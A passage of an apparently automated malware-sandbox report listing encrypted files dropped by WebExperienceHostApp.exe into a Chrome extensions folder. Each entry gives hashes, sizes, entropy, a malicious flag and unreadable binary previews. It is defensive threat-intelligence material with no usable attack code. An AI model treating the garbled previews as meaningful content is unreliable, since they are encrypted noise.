MD5:	4F895E198F4195FE0E099522733C3454
SHA1:	3C47D29E6A01B3F621EBA58AEBABE7A1A998D2AB
SHA-256:	08A636D531CA33598EAA3D97C50E538FA75D0BA47A9D4819A2881F9D3792DFF0
SHA-512:	DF2084D02223E7671A28C8834A7E25B3E81DD173D3B56448ABDECC077308064DF2394856FFA6C45B504901F9D26295742F96F25B0BE0341CC5A90026A3B86642
Malicious:	true
Preview:	.M.....8J.KEe..M.6#@...Q.).@T;s..F.P..cz...>./.a..W..I2......SFa$.......X.V..T.x.!H.%(H.....s...=gs........p......eeoq.J....?-.=..r..b..h........h...e..[..._2..6....A......F.A...u......,..;.....:......R./:I...H.kR..S.]E....1b)......;N.D.....x.w.,......&...u....0F..5....v.L]r./..Rk...c.........b.T.!.y.$..F$80..+K.K..a=..)Zj.w...tY...i.w......H..Y...".&n..9%.%..%@y8l....%.0.p....{>...j.H...'.R...l.T..'.[.#!P....%.....e\.^c\x}.....V;..h0L......7....;.NJ&o.b.6..u.0...z........Y.j.Nrf[\y...&.k..%.E.,hY....R.]..4t_.^.#.SR.QT...b....5. 9$.^p.S........~....rE...Y`;Z.@..cmOom.[..U...H..Zq..L {~".?..T....G..e.o.b...F.~W..G)u...J..8....).3.v..........=.7...8....W....D......}V...t..>......;..Q../........~N..9&..".$h.\..0?.mE\|.j.k..}.RP....I`..6...ql.U...q.....5+..?.N..9~..S.....9.S........1.u......v.?.......D.......p.^D....J...G..Y..GC....w......F../..0X..k.Q....c...J.......E.H..:~..J......A.xA^....0...<.,b...j. N...5qm.v..@.l...............h

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.130

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34231
Entropy (8bit):	7.994480734392986
Encrypted:	true
SSDEEP:	768:rO6t9pwy84bJlx8TsW/MnFp6UQ3Ep2UIRd0iTOT4VoEVEVcm3UccrEZc:X5brx5DF6wiTLVoemL3UU+
MD5:	387E6FD86B5FE22E6715053AAEEF5AEE
SHA1:	15CBD751849833474EF6A2A220ACB257436B9EE1
SHA-256:	0D5D5753B0497C798240D80FD4D2DDD8AF565DAE502429B6A4FB2EA406F212C1
SHA-512:	7B0FEDF111253B47A58C89634EE01A830B383858ECF21A608A44244919D23472A86CD289E553576815ACC196CE1FC9F7FC5BD8C489A5D52717FAF3E763939480
Malicious:	true
Preview:	.\|.s..'.[.;Z.....0.t.@N.c.rZ..V..p..>..f5...!..7.......d:..T.>.<..o....HT-.k.j.o.Jn?y.v.....R[h.=...31._.C....'.n..j.s\$.`..$f3.......#'.R;..}P.x..-... .;.)...x..G..k..x}...}?j)Z...w~R...\|.T...l..'hNp.bh:.....3.....U.$.......K.zl..P..UUp.Wkd.XZ...: .v.t.....3&k..+......#,...>./..u........v#.7.C$..K....Q2..0W.......{...yW&..3.:...4..5...?I.._Zo.C0....W.>.D..S.:6.yi..i=J..f.....,%.)N.\.cb......BjGS.n.R..l...-....TZ.UO....6d/.....6:..c..u3..`h....RD...24..x....l..T6..<..B..O....#......N2.\|HN.'..).Sy...`]..X..?.q...-w.......B......z.A.P....w.Z$.6l...z...(......xgv[o..c..\|.....s.Y.[..X......lv....W}\i......v.b.J6......_....j..8k.~........m....R..X...b.........X<l../W.............wCb..!..s.i..;..(....#..g..E.#2...w.....e.xa.].....y(..nr.3dB/.c.}.b....1....^\n...V(....0..e.0..5.l$.. .r.4q..dr..m.$...[.....H..{...LU],..Qo.".NT..:..._.7p.x;.$.Z.'.....).JQ..q...................A.m....MJ\|.....x....(ca.;...^-z..D..+..v...b.l.4.D.^L....-Y.._c=.V.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.131

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	91144
Entropy (8bit):	7.997857145974636
Encrypted:	true
SSDEEP:	1536:0sUPpMLUFKpKE4Zinvvc9jIWFdJjy6eRWOnOPgBHczwa8Orkj1to2I7S4Rgq:0sOcpKZI8VIWFddzeRYc85tr3JB
MD5:	10DDF6F8F750EE7255E2D93673C98AB6
SHA1:	30CA9E78DB96B55B7D47824F26F4B5228712189D
SHA-256:	5B07CEB8F27567C07BD1FD3AE05D55026AA5D19A1579FE2FC01EA8E2500BDDE8
SHA-512:	94EF2520A265A5DC00B26803EAAD5D45888474BA0824C630C28CD941F1605D042F9F7D539DBE22CD884BD201C26B629B7B512A57A4599444C9C738CF023F87DD
Malicious:	true
Preview:	...\|.05...QR..99....e?+Y`....g...6....s.~.x._6D.+.%...=m.q.R...tg.....N.x.U...;..87.....)H..Y...vxb..7.#.....m7.@......hZ.....puf..c......Ro.....4VH.r..u.j>.....\|.>Z..,L.....X. IR.......[[`B.n...`...e..Z./..2M....$...`.=.x.).,.#ke.5..+.l3..6...2C..<VN?x=.....\V. ...Ls.5`3...7.IZ@.......%p.z...-....%.U...._.$9....Z...H.h...Q..(y+T>t..o...H..X.Ms....E.....X.F..pw#...R...wo.k....I.T.UAS.?Zn.RJ ...A...[^.........D..m%....0[......f.Y.>.po..r...+)..).#..r..V3......E.....o........e.pY.,.?-....g5..l...d.g...1....M.q...7$.hd....._=.......;.u...M..?..Q.....v_#..d.........\|............k./.r.$\fHv.<...MX6...Z.zvY...Z..:.Y..x+2..`{.-.0iT.{...........IC....2.e.....A.B.T.dq!"{O.V..q.........+z.>.b..=.........].x..)2A.`>z)>..E....q.m.m..nW..s7.....o.(Mk(..q\|...c.[.$K..f:2.[..W.9v@.e..5..v.....9..gU.1.._.Pk.).. ..!.i.....=.F..-.3.......t....^....s.z..\|.STs.7.1b..........F.[...r`...3.9}.&q.Z..!=vQ.r.........7.S'o.f.Jq...,....!]l>.FkT.!..Qj:vR...(?.C..e..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.132

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34109
Entropy (8bit):	7.994957193282963
Encrypted:	true
SSDEEP:	768:P6ZAKfHTX5v3gb9y4feQ+OHFAD3fdB4e61:jKvbpIf8MAD3fW1
MD5:	5DC8558DE5DF3DC0D6F357BA62F0DF2A
SHA1:	8314B32BE69CD99BF3FBBDAE8BCEA646496828B9
SHA-256:	84A3ED840139AA17280E6D2351ACF2EB31D8FE56FE2A87FBED5C1AC155E21072
SHA-512:	D1D1EE6554E071E8C1FAC5443DA7E94197ADA81618CB37757FF14B9D4A334AE524FA13BA209FE11A7ED9EF3A5F7E138CC10F8681A7DB8AC9287ADF36EEB1E94B
Malicious:	true
Preview:	p...\|:hC\|.d.I.....3.EL..,.q.5...".~...8.Ynl.d.....f....E.r.,kG.....%..Za.........E...._.....~...%.r.jV....x.mE;d..bXX.FP.3O...4..eO.X ..M.uZc'.FE.w..^...)...........h =. .W..)..O..{.\|...dD...Y...x...........;t.l.........y.......~..S9"<.c...........8....Z...BA.~.i9_. O.......+.6Q..v..d6...+..~.FH..Y.cp\|.....\|..._.M..+2s"...:................4.R{-]`..._.-M..W.....X....#.P..&...R....m.y@..4 I.Aj,U.botN.;...\|.nP ..QY..vc.H..S..;Q......A....4.aA.../...]...7."..r"..N<..8.y....^k!./.].f.T..fX...>..PM.{.x....o....BP....^.LV..N,f.2..P.....?.........Y....Q...U....c.o.X..I.SA7...%....[...(.mE..............}..........._.....\|U0/(Wv.0..Hd.,.H}.s..r.......@.dFu^.n.[.1..)8.03.....E.-.Eu..u..P.1<.T%....M..d.......g=.=3s...'X.x....,...u..j....!..7.c.....>....V..A.#)...tA<?.X@...."..2".....b".........@9.$....\......go.]..R..b&....DD.BVv\|..D......U:K..L....$.K..P..2....y`...J.}...p..->..`...2.Y.....:;l..CK;<l.gV.4.^.q..O..D^T<.._...n..Nc.a..?...C

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.133

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	87900
Entropy (8bit):	7.997870438352977
Encrypted:	true
SSDEEP:	1536:P5w83TlWt4tJ3XyZgF3P9VVl/zfGHqyz7e9Kw5LG9v2gIhgMCm0nm:PSN03iZw9Vbs7e9KkMpIDCmkm
MD5:	A110D0CA4523D2E30FFACBB9525FBA66
SHA1:	383853E845377B4958C757C82547E3DF3E011963
SHA-256:	737443FEFD8C0F0CB7216B41C370CE1B0FF8C0A24AAB21786FB3BA937FCBDFB2
SHA-512:	B4F57C850BFF0B13C9FE839D651E7045DA9630EB8BD9C6803653337E0BE2D802DF9F48EF5E82D0ED9C17BB3CDD7688178B41C6118B889C6FE50555CEB63559EF
Malicious:	true
Preview:	Q-eS.Y='.W....B..''..1.....s..!&..3..'...+.D.w.n.L...h..l..7....[;..y..S.x5..D.....uw.]E.m...c9.r.EKeY..I..`UB.f...r .K...i.....K....V... ..b..l.ND......x...G..{.sU..Z..... ;...BMoZ\|...IP..j..Il....l..B.......Y..o.Q.vz...w..:c2x,;....k.[.#0.\|..oN..D%.4.l.. ..N\|...9.e......4....RCX..a....r...1.b.nHT.3?.]...n....Z..1\|.&Q...G?....C.4.u.x..2..X.3.E...s+.6....b"...t....m..2C.k.R...../..dHaG.1i..2...[?.g.i..6C..@H;..%.6....En#..~........xg}XS..,.15.Y....@..ll..p4.S...G.x%e...))..n.<..Y.O/~9.{.R.cTK.Wu!..z .5.MT.c.r.sW.>.......u...s. .~...[..........u2..!h(.O<-..j.9.@D......?...J.BC...._.Z..n9.W..c.9~e..h.E..N....Jo.\|..J:.).?X.9.....I.X%t.c...)8.BI.m...[..".#A......m....,e&..t.#L..ade.y."A0D.4.p.W.U:.....5.w....-.....DE...<8.S0U....bx.......$.......+J...%.....?......4..-.&0.;.1x.1....F......R(WHC....#.k.............[...y.o..P.......6]A.:....Si......u..j....:X}..i.*<....~&.l9K...A.~(......=.&..tN+.EOf....pih.+aw....x....X...+c.c.h..U......GG

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.134

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31016
Entropy (8bit):	7.9940900864763655
Encrypted:	true
SSDEEP:	768:mzuHoLzu4mfxB4Suyl8rUXNsidVghzvcFz9RA/5+:zYuuWuoghkFAh+
MD5:	732D06D7E503A22E4BD5095C1604B652
SHA1:	DF2F76D7B99CD3C092020871401916226983DEF1
SHA-256:	C3E19122DFF4F48340779DFDA046C1052C8879649BC34CCAAF14C23D75313ECD
SHA-512:	2060C46E53BD61C670768B80E0B81F2BB40C9570DD4CA724A5418A8042DD756A5765D7432DFB5FCBA223B89E24E0C10B32E348DEA93011A22A6CB0D9BA674DC4
Malicious:	true
Preview:	>&iFeb_nY.o /...5..D..l..F..W...Q..z.7.....}.......>\.M..[..[L.~o1.(..Hh%...a......E........[e.m.y...PK^.y%bom<..b.(>03+.8.^=z.~l.M4...&...[.h<h....$...2..S.t..?..m.....=._..(..m.}....T.3.f.{...G.......7.A...r><R.eV.v..z........\|W.Y5.Khb..;...E....`..E;.u.0[s..[-..V........P.0..\|G.z..&.O....W..X..~]..v.....;.y...W..a./X...]....!..f.....Mo..\w,.e.(z1b....-...&..........q.2....e......j..;.\...../...S%GH.S.......C..Y..:...e~...q...g.Wl $M../69I.^+..8.mY.p..r.\....p...E.....I.K..{..z...r...R.j..l.\|v8..x..m.B.z$.{V`..U.......)@=.!......<..O....7.>.n.:!........%+....C......9.U....E&..`..w.,....Ka.........%&.M.Kh.&..%.Yr.`$FT'.8.q...x)Y...#%}..R8..k.vo.+._@....m.5c..p.m.!Q+.p.~"#q.@.g.M.8...u..=..r9.9..i..\L.tDN.&.DH.k..!.d...7..j...&..J....}...a0..9>h4..[...nX(M....SL..C..7..q.....t=B.%..m.sa{."@.6..9[N..(..>.k........4$p.]..Z.,.LIy..pf....x...C..wX[.{...X%.d..&K..?&....u..Z...K.`.Re.)7.....{.g...!..Mv$..r4....K.o.TA.......i.s...C.E...}.'EM.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	59092
Entropy (8bit):	7.996854200832269
Encrypted:	true
SSDEEP:	1536:nQcHqChxBUpDQYZNW9EGAVa9DsN22SYwL+y5BS:QP6rOZc9BRxsU2SpLJC
MD5:	1FEC938C2E85531A697E4818F32DAD98
SHA1:	ACD67DA06ACF14270895F8532B798C45E259BA66
SHA-256:	6B3265B2F82E206BED8B6CD56C2A3F0FA9D8FD027E19A9713DA618B177D9264B
SHA-512:	BB746A8EABECB682C72ECCE9EE270CADEFA1FEFCE9ECA954A613D04E62AABC7396CAA34DA5513326F9B17C753DF1CD19C4D494262D08AC91ABBB5B00E9BDF4CE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: Br_i421i2-2481-125_754864.msi, Detection: malicious, Browse Filename: 181_960.msi, Detection: malicious, Browse Filename: 232_786.msi, Detection: malicious, Browse Filename: zHsIxYcmJV.msi, Detection: malicious, Browse Filename: 18847_9.msi, Detection: malicious, Browse
Preview:	..l......q.33....Ve$.6'i.......".b.:.e%..2"cA..`...K.#wV..^.......$...t5)kD5.]..G-......O..{.l.Bj.TJ........$.P.E(....5.....E.....v....`.7"...n.fdm..V>V.\|.J..qu9..;.t...h.E.:v... ...v.l..H}...P0R......;....R.q..}b.#~~.....z~.:.L....p...r....]:..z<s...Y.)w4.?%S+.:..{A.i.-...!....../,..1.....0..2.z..p.Q..V.b..W. ......>...!g..78..or.......S..2..A\|.ck=..e......f........r.6..\|9..%N.......j+.^..a.C.iAw7ML..I..N(4.~.;k7fdy.../.U:R....0v......mO..-.[,..Q..P..Z....A...qFWO.........(...".?.Th`..}..sQ.......^.#u.6..B/.Z..C..o......Lw....N........=..,.0...j'.9.....`...Ks...........V..3%..N.k.B..wl.....F.k..k...{..4p5X.9f.I\J)%.r.F.#J.1..(.......U.#....!QN..........e-0..2.......1Ra....Y.ar.u.tP...Y...K..\h....?W...c.k.{.z.y....kK.)6-..........F+.....W... .O..?....a.l..-.".~.A.7w..........h}fSn4......p:77d...%...$"Hh.o......5a.@.^.J,..l........ze.W.~..ps"...-....-n....2..\....T...A.9=...^......r.1]..g...... ).......B/..yS;T6.e..(.tG..V.....A....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.15

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	99566
Entropy (8bit):	7.998142581654128
Encrypted:	true
SSDEEP:	1536:11pBXOaib3JcpNn3unOqtp5NKGeoNgFcoSS6HNPdeC7vrFG6M6f8E10VOQLwt:11uFcpFenbtfNKt1SS6t1V7xGdJE1w0
MD5:	8FC1319E8467E8BD4D1BA7C51AD77EDC
SHA1:	18B3BD1589F80DA0C3ACDB74B31543F3308867CD
SHA-256:	148AF3A3BB85DCF2E8A111FC6C2E342CD62C9B3C316352DF26F7CD5C46960E8A
SHA-512:	A159CBDC5ED761AA5D643C6CB7D7BB96C8B5CF7E162CBBAD4BF399B3109A6988095CC8BAC9C6B1D9E3EDBEBC094E8B5175FC9BB59FF6BA1F715E79BDF67888EB
Malicious:	true
Preview:	.(J7..%.c.dL..Z;yk.~>D.....o.gI.[...)..^..?....G....k..gO..P"g...g...%.......&g...iU..`@...4S...Lb...6.6.,f.....kOj...............W .=.......x.!\|.k.}.@..(k6....Tv4yY.h...P..!...v.BW..u"s.c.e-.q#..S_...y_.5.....I0HK....Yh.H'.&.Z.. &..\...p.../....b.A.1~!..5........k.x.u.{.S9.D....c....@:.(z=.t.x.l8..x3h%..........W.3i.%>>i....F.i:.#Me....o..9...J./W.s,.$G:..]<.N>j.0...^_.7..?.v..[x..h..9...}.Vw..0.L.Q..5B.h...x..BJH...+..V1.M...);.,..1..B..B...b.?B..).,xF.?.7./2xK.A..i..pV.@!.h..Xl.U..P+.F..g.,.....Dd..w..!..Yp..6.,i:.@.D..$...Z...m.+.j..A..k.C...m......Or........TqY.`..^,m)..r..~<...R.S.u..H..@.....q}1a.&..C,i...x...a.s;....:LE.f.jO...=W..c..c...&O..)...).C~0..`l5..m`..i.<.....-.}...e-u&..Q...rDa.....q.......o..j.#.#..M.~z.rZ.g........F..S.._.,.H^[....k..H\7qi......-.8.W....Q.K....:...j,{>...[..$.U...f...V.....T.j..Fr....C....+..mo.7.....U......hM522G..7...mY.j.*.v.i..U.`..@..&.NC%..J...m.Q..[...P~.7r.1]...J.R~M..8.\m.{.......U.........

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.16

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	32929
Entropy (8bit):	7.995142105934198
Encrypted:	true
SSDEEP:	768:2Vpo/ygeRrOP/GwLrTW8R8+DK8uRhsm8uW8RRO8oLEhXBVccV:2Y/yxqn7LrDy2K8uRYCR08VRVc2
MD5:	1A0F824790B98E5EECF3B5C4948FBBEF
SHA1:	C77586C8CC6978E898E3A82D3A9F82FBEF6DCFAA
SHA-256:	845BBDE5E4614BF9B1367EC32B60D5621F81E5D59750D4AD350DE77FDD0CEC61
SHA-512:	5BC3215F34B99D6EBB12B3282602A3B41ABC1522650C84DC1E095004B8D352C9074A01BE940D053BE2524F3CCC5E1E279094A71418D7CECDA1FDC9BDD4008B42
Malicious:	true
Preview:	.......}+v.TK...T...0.6;\..t.,.hLObgAEf..N.C....E-.-NoM.2..g...UPx... ...Y..6..f.V:.E..z\f......Q.;.c.[P[..a(.l..?.W\...q...._...n.._...T..-..!..[W..p.2H.pH.r".E..1..6!...>.......\|@....x..B.....f.?...PB...j.{.~....._.....8(..:............i2W.m..........J.Sv\.f...)...\|O.)...&....@...p5>.J.i?......J..;.%O1)..1$..L.....Yg..\.....#.u.V").....@7....q...}..W..Ds..Oqu....9.,..E......I..D..`..Om'.H..8....o.....S.e.......82.4_M..K......I.......6......!.J4Q.....R..F.....-....`jZ.SKp....iRs2:?......L.....#.-;&^....<...=^..(...>..A.2....L...wqdd.e.......v..^..pE.....1.".....7.....[.x.n..........y...bi..j..p.u2;..mq....s&.d.....V'...'F}.4..N.T.....@..."....Ri.H.....l.-5.....RK..}g. .B...3.s.......I.:.-{V.a.......kP.'..7M..tJ.+..E......Yg..~\...(vo...nT...<...TR...7..2.k.'V[O$.c;L.qw........qqE.j.cT..x.E;.K.A3..~WqL;.=..."xa..o..h..J...O..yW.z)..C..m..A.......D...\|w....z\0.......9V.K`)...{.....0.,..G....v/....T..s...rm...>I......J.W.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.17

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	89875
Entropy (8bit):	7.998029926157943
Encrypted:	true
SSDEEP:	1536:cg5WLAZNQ6KI1YmfSGt0V7jIjo76clkqO5zrmpcwDkq2eWjE5iax+:cg2AZNQXI1Y7EBqICp/C1aE
MD5:	4BDD26DD891E354496551B62D097635A
SHA1:	6E06C30B152564D8A0955BE716122AB025FFFD01
SHA-256:	2E57C992E9A493BFB21D02BA6C815E889DC116218792005A16CAEF8AC164C927
SHA-512:	234F2AB6F2CEDB000332E66B99CE46AB9EC9EBF836EA85BA78DA39D0E825F8A8CAA225F87E24BF50D6358540576A02FCECC833770CD8D58442EC08E3D4455B09
Malicious:	true
Preview:	..9...h............J.r^.&.<. P?....5..j)^n........T..:.O...$...@.Y.iF...x....P.7.3s.I...7...3p(...a&............GN7..TJ.v.QF...".(..+......}.7 .qgw.u.8V..j.....qt..9..j...{.S....t....{........b.......~...iwX.$.e!.....ALk...w.VFs.h..rL...5 ...g.N.j/....$.0E[....}......}...c.d...U-.\|....).....zd...v...>....n..F.4.(...U..Z .e...S.IUnk.4>.!..T....-...O..].i..'.B.....bp.gmGO.V.1fE.J..1..W..........\...Q..B.E !...ua......{.5..f.w..p.6\|.Q......E].u.e\|.2. ..^.nn...FO.q}.......-$...;..Y._4..b......3K...c.p%vk..x..<..l./.(.).:t?.2A..W....@%>_.`'z.t.8.;K....2./Pmo.%..htM\..s.Y.Z.'..]......h.l.DG.....Q..vx.S..FC..$.?.'..U....d..g.u. H.`...Z~..n....tu..#..2.B......+..2.-.g.Y....f.....~...:=x.[Q..N..N./.....@....(M4e!.N*.e.4_..Ee.>....y..My..m..&.....C.p.+!..I.0Ll..E...T...e....Rj}.P.q.......0Sb38.jt....c.!<.j..K.....{.1O...I.).PrQ..[qVN...Q.G8.45....W..ku.E..1........../...h%v.+..^..].N.j5.&.._..5\.p....m.....<.....Z}-~g....h....w..........

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.18

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	30989
Entropy (8bit):	7.9942688000816435
Encrypted:	true
SSDEEP:	768:Luarjxb2OOxXsd4yt72d7QdYiCiO47IfacSyIH97Lu:LpxE2XdYRij0yXru
MD5:	1D252CB7FD476035B10202A3B38B15CB
SHA1:	A0E2B89EF48F57E35C634F06D2D15D1B9133724B
SHA-256:	871905449CE580A5F48114234F43642EC65B4666826C1855E534B160397F13A6
SHA-512:	0BEDF0A9352B853353357930130EEDF6DE2BD2240926AAEBE882B34BC92A2FD2223C01754A26DB295FDE2E629A20EDFE1B4D3B16918310B67DA224CFA477586D
Malicious:	true
Preview:	X.'.U55rpF......p.3....{ .[d.)N...j.U.O!r..h..&%..?..Zj>@...z@......'&A.?.=...EY.$I0....F:.P..,...x6.....R.@..S.u.H......J.l.tN.E...;..O...V..HYt...D.e.0.o.....c...:.......r..X.....V.J=.Vw.....R...Po....Ne.X.P.u qG..!6...}.1.a....0....$.9.....5.7...N.....73^.....[s.\f..<....Q...s.9........0<.$.8y.P.l wh9SxM...;sv.y,.^.3...v../..l..tl..FQ.......8.X...(X.[.....q.....Y.E....e...\|.~.....S.."........b+B....?.FT.3...m#.......3..ee.+1.6...y.vn-z2.L.A..8.4f..b.(D.....K....I.8.{..je.:(1..@..<[.g.t........0..\sc.....$V.....>..A.%.Yh.1$...Ns.]..uehx.....!...;.:...zJ.:.-..../v5....H]_C........$j....4..f1#6FN~....x..c....\..=.d..I$.+.{&...m..3........O....[....$V[.....=.wSh'.D`>.9U..B.........Y....n.\!....z...hO..LX".&....0..%.....ar*.h......'..I.p.t.... U.x...Em.x.4.19..ZL...<"..G.......K.b...4tS.?...=...B...~.J..."g.7\.5../.f...P..W...X...).....<O..a.V.$.]...vLou.....y...!x...SP.K....N..fdE......S.n....Z......V..s.....v2.J..BP..t.j3......m.1

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.19

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100854
Entropy (8bit):	7.998042000988432
Encrypted:	true
SSDEEP:	3072:uY5/5vmydG4HG0HmptkQep0JI/40HIUjprOka:nSydGAG0MhbJvajtE
MD5:	3EB4691C8B69D03AA006705F3AD53644
SHA1:	CD20927B17FAD837E4C4EEFCED6810BD914272D5
SHA-256:	7472270F88BC4DA345A0534DDD3E538C7A478FA360C7E216AAF5AD9A35B1941D
SHA-512:	24FD48B423F9C55C040B65977F863B7084ABD2AC78A8407802F5C6A4B41BB002537E1BDE3CEF900C89902446CB3E765A68591C75EC96D782CABF962519EA489B
Malicious:	true
Preview:	y.E...ro....=....2..h.A'...~..J.y...R.`?z..V....gW[7s"(.%...Z..y.......S.u.H..)/...Kd...mf..Q.Pj.....Pd.2.....,!.f......}..>Cd....Mw...hoc .Y.5.!..._....B@g....~.{.Uk......1..U......\|!..c.........1....`H.Mje.].....X.>...RX),q4..g.!0.zlMY'tm..di;........K......?N..../..v..z.....n....pt.[...m.@...cO..CA?Pv.8N&....1h.^f/\........I.;...\..'....$^...%..#.3..@.....C~.....=..R......<.:.6.bb!Y2./.%...q.#..1kjsh{^....}..v....E..U~....Ir.G.....+S.Db[...p..<.Y;Y.:.1...=1syw.1.z..\........r.....G3#.(..M...I..h...v:$.G.P...E...........=D...oA......']......R.r1..'....<.R..e...O....V.G.Sl.\|..2..8K;..b.I..B.f.u"...P............z.@[.7IM"k.D...OE..#E...HdX....@.....6..n =].B. ..BL)..U..o..P.J.....jC..V$.a........H.z..].`...3T`.N.x..s..\|C...:>;ze`T).T..Q.g.'+.8.&...S....qQ.E...4g..#....:.Q../4..z....mz...u.=.=.So(.~.F...Q:....'.lA8E.].g;.a..L..0".=I-.xs......B.E...b....<..%1?QmIz.p.......V.+@...Ae3._.R{.p3..`..m,a.s5g1;.8.o...#..U......N....2...X....u..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.2

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	103706
Entropy (8bit):	7.998393214541903
Encrypted:	true
SSDEEP:	3072:iISkkVPeOOtBVZyEnLMlaHl9lASmeioqXAGhirknL:FSk40vrRng65MorGMoL
MD5:	F26BFD7BE7B6759C104C75743E35DFEB
SHA1:	8F72B1590081CB3130062E9027FFBD33AEA7BE29
SHA-256:	4B838E4CE117A89EF6F3ECBB881195D34AA69C3F6CBB6CAC5B8CE62AD68120E7
SHA-512:	87EB5CE22EEBBDD4CCA03FDB24DD5CABADEA39BF34B9F01BF6BB655CF89729BF0028350A05279586533688EE818781B9EF305EE969DB9EC164469C67F8E97158
Malicious:	true
Preview:	..7..IER..@EU.HX....)..F'g..x..."...j....p...-....$.z-H.e.(...M.........h..,...S...>...?. -/.....?E({..B...`.,j...Uz.O..59......./L.Jg........CZr.......n..n.H/..K3?!..G%3....>_N..[p....&....N...1.k.7..../...9.....:....Q....@Z..:\|E?.}..Q..&.i@....(%n.....!.>.p.U.P.\|-..$<j..q..m..~...'.?.C.uT.LH.6.A...?;k..C..~..y.("?.._.K...1.E...<L@.b=..hi..9W.h'.j...i.k..X.....f.\]rr.E..........LG...u./..y.....\|...D..~\|6.P~._.:..z.%...UM1.....I.G"...kR.........~..rQ.T$....{.G..GTw\|._.U.E..$u@..Tm..#.^.}......+.......}_..! .....l.^.WH.3ku%r.....t....vp.b.h....@.......A.L..OL......~d.._...Uq...1.(#.j...\|..R....T..1.:\|Fv..n.`.....h..5...%-Y.....G.Y....1Z.t~..Cp..:..\.N~i.p...]..sn.P....%.\|..o.....TQ.;=......P...e.>M..P...9H.("\|:.+...F.....%7..`.......'.O.dd.."..F.Q...w.Bl.<m>...0.8A...E..F............}...b$[......f^N.s%..<MD.......D.Y......6..7.M.m......t..i^....SP...k.H.@V2......7..*.<....T..zy.......'..\|..!....4.b.....@.n.)..1..\|q=.........#;5q.G.^8"Y..q

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.20

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	33488
Entropy (8bit):	7.994824218932575
Encrypted:	true
SSDEEP:	768:USiSWn8d8z3lZlQp0t1X9f7F4lxWZGYrPO5hMdR:JVaLa0HXF7FuxWZD0hM7
MD5:	5010E574CC4F0EA67148776AAE448C71
SHA1:	17B4C769849C30A59ADDB85E5D8ADFE66973CB66
SHA-256:	948EF0A1EFC48907DDC8C9E02735708347D047B3CEFB2CD45A818D11F12A50BD
SHA-512:	E7A7813DB86B07348D3E58D9B3E7C3E35FF7FD31E7D5CE93FD6CBAA3D4A3773382B53DE1BA7B2F078B2C920A2FC748000286DABF615AD25ECE373BB40CA6AD0D
Malicious:	true
Preview:	F.U....N.....Sa...s_.}..B~.A....t;2.....^.T.....".Z..A.>.XV.F...?..0^(@H..s9...i...h\........c..;<......a.\|.s8....\9.m9.......H~..ul..7.i ..O."..s...i.S.r.mA...T[.g...C.Wo.....b....9.S.q.z_...w.=a3."D5..i...Z....\|.GI6...:.._.ocL.........x..0;]..[\|.....V}....C..u..tv...N...........w...ou.A..^..........G.1..s`..;:P..S..&..w.TH..../C...`..._F%tk...;z..?...nt....uy"r.t........I. ..W.}q..3YDF.......j...D.1..,\@..y.b.c!.?..P....Q..Wk......._.i......(F...).......O.E..na.l..0~....."}..G.d..9..`.V.:./.j9....(..Q..0.).Q..ev.WJ.M.....+.C.B...F....<.k........I....O...........G...@/...c..??..(...p......Z...y.H..DF7...Y..@....l..7Q..e7..d.g.O....Vg1D.U.....Ml;Ke...z.g.d..H9\|...P...h1.....=....'..\k=...'....$..g[T..l=.w6...Q.D...o...+ ./r.&.k...p.9....&..c.5.....,v.>S.y\....w.2F..._...eL..Jw..i@G..]7.q.....d.....8..../...w4.D.....`.< ......2.(.D...m:.2..H....&.C.u.C_...X3......@..BQ..S.P8.1...gm~^.h....-..3j....n..v].0.S...(..........K..eB..w.Qc.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.21

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	101930
Entropy (8bit):	7.9981901474610915
Encrypted:	true
